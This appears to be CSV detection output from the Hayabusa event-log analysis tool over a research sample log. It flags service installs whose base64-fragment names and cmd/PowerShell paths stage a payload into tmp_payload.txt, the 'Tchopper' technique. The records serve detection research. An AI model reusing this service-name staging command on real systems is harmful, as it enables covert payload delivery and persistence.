aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 